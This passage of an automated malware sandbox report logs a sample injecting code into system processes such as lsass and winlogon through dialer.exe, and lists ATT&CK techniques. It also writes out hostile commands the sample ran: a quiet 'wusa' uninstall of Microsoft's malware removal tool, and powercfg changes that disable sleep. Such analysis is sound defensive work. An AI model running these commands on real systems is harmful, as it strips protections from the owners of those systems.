          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CE69900000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 29283380000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 193FA700000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CBD1BD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A84D30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 28571390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2551B760000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C383F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C38E60000 value starts with: 4D5A
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\dialer.exeMemory written: PID: 1028 base: 11C0000 value: 4D
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\file.exeThread register set: target process: 6768Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeThread register set: target process: 7120Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeThread register set: target process: 2876Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeThread register set: target process: 528Jump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160C9B0000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 254A2D50000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160C9E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 11C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CE69900000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 29283380000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 193FA700000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1CBD1BD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A84D30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 28571390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2551B760000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C383F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C38E60000
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140001B54
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140001B54
          Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 00000015.00000002.3382587390.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000000.2115486873.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2129847734.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589636F0 cpuid 21_2_000001E8589636F0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140001B54
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_000001E858987960
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          Source: Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.52.drBinary or memory string: MsMpEng.exe

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API          		11
          Windows Service          		1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution          		Logon Script (Windows)11
          Windows Service          		2
          Obfuscated Files or Information          		Security Account Manager24
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
          Process Injection          		1
          Install Root Certificate          		NTDS441
          Security Software Discovery          		Distributed Component Object ModelInput Capture2
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
